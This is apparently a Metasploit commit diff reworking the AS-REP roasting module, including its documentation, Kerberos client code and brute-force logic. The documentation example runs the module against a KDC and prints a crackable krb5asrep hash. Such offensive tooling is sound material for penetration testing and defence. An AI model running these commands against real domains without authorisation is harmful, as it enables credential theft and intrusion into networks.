Kerberos asrep roasting improvements

adfoster-r7 · adfoster-r7 · commit 89cf0223d159 · 2024-07-24T18:01:11.000+01:00
diff --git a/documentation/modules/auxiliary/gather/asrep.md b/documentation/modules/auxiliary/gather/asrep.md
@@ -44,7 +44,7 @@ usually preferable, but may be less stealthy.
 An example of brute forcing usernames, in the hope of finding one with pre-auth not required:
 
 ```msf
-msf6 auxiliary(gather/asrep) > run action=BRUTE_FORCE user_file=/tmp/users.txt rhost=192.168.1.1 domain=msf.local rhostname=dc22
+msf6 auxiliary(gather/asrep) > run action=BRUTE_FORCE user_file=/tmp/users.txt rhost=192.168.1.1 domain=msf.local
 [*] Running module against 192.168.1.1
 
 $krb5asrep$23$user@MSF.LOCAL:9fb9954fa32193185ab32e2de2ab9f13$bf14e834c661246cad302073c228e6ff7894cd3023665f0f84338432c3929922ae998c4a23bb9d163dda536a230d0503b2cf575389317b52bde782264940e80206a29e9613e47328228441cf013fb1f6672359f6799be97b962de9429e8859f437e53549be6b11ca07af6f09eae6cd78279af6d7f6dcdfd011eccb74b4aa753b2f9e6561c59c9408ee4bec983777908f3a7eef5fba977710e47e4e8ac0af10608a7dd23db506202b27d7892bc28426d2080c343edfe243bf1cae554cf6204733082332be2455e4674e1c3e84614818a6c15b54221dcaa832
@@ -71,4 +71,4 @@ $krb5asrep$23$user@MSF.LOCAL:234e56b15bf3a0e3eb93d662ea6ded74$9889b0a449154c1353
 
 [*] Query returned 1 result.
 [*] Auxiliary module execution completed
-```
+```
diff --git a/lib/msf/core/exploit/remote/kerberos/client.rb b/lib/msf/core/exploit/remote/kerberos/client.rb
@@ -292,11 +292,12 @@ def send_request_tgt(options = {})
             # If we receive an AS_REP response immediately, no-preauthentication was required and we can return immediately
             if initial_as_res.msg_type == Rex::Proto::Kerberos::Model::AS_REP
               pa_data = initial_as_res.pa_data
-              etype_entries = pa_data.find {|entry| entry.type == Rex::Proto::Kerberos::Model::PreAuthType::PA_ETYPE_INFO2}
               if password.nil? && key.nil?
                 decrypted_part = nil
                 krb_enc_key = nil
               else
+                etype_entries = pa_data.find {|entry| entry.type == Rex::Proto::Kerberos::Model::PreAuthType::PA_ETYPE_INFO2}
+
                 # Let's try to check the password
                 server_ciphers = etype_entries.decoded_value
                 # Should only have one etype
diff --git a/modules/auxiliary/gather/asrep.rb b/modules/auxiliary/gather/asrep.rb
@@ -46,7 +46,7 @@ def initialize(info = {})
         Opt::RHOSTS(nil, true, 'The target KDC, see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html'),
         OptPath.new('USER_FILE', [ false, 'File containing usernames, one per line' ], conditions: %w[ACTION == BRUTE_FORCE]),
         OptBool.new('USE_RC4_HMAC', [ true, 'Request using RC4 hash instead of default encryption types (faster to crack)', true]),
-        OptString.new('Rhostname', [ true, "The domain controller's hostname"], aliases: ['LDAP::Rhostname']),
+        OptString.new('Rhostname', [ false, "The domain controller's hostname"], aliases: ['LDAP::Rhostname']),
       ]
     )
     register_option_group(name: 'SESSION',
@@ -77,26 +77,36 @@ def run
   def run_brute
     result_count = 0
     user_file = datastore['USER_FILE']
-    if user_file.nil?
-      fail_with(Msf::Module::Failure::BadConfig, 'User file must be specified when brute forcing')
+    username = datastore['USERNAME']
+    if user_file.blank? && username.blank?
+      fail_with(Msf::Module::Failure::BadConfig, 'User file or username must be specified when brute forcing')
+    end
+    if username.present?
+      begin
+        roast(datastore['USERNAME'])
+        result_count += 1
+      rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
+        # User either not present, or requires preauth
+        vprint_status("User: #{username} - #{e}")
+      end
     end
     if user_file.present?
       File.open(user_file, 'rb') do |file|
         file.each_line(chomp: true) do |user_from_file|
           roast(user_from_file)
           result_count += 1
-        rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError
+        rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
           # User either not present, or requires preauth
+          vprint_status("User: #{user_from_file} - #{e}")
         end
       end
-      if result_count == 0
-        print_error('No users found without preauth required')
-      else
-        print_line
-        print_status("Query returned #{result_count} #{'result'.pluralize(result_count)}.")
-      end
+    end
+
+    if result_count == 0
+      print_error('No users found without preauth required')
     else
-      fail_with(Msf::Module::Failure::BadConfig, 'User file not found')
+      print_line
+      print_status("Query returned #{result_count} #{'result'.pluralize(result_count)}.")
     end
   end
 
@@ -138,7 +148,7 @@ def run_ldap
 
   def roast(username)
     res = send_request_tgt(
-      server_name: datastore['Rhostname'],
+      server_name: "krbtgt/#{datastore['domain']}",
       client_name: username,
       realm: datastore['DOMAIN'],
       offered_etypes: etypes,
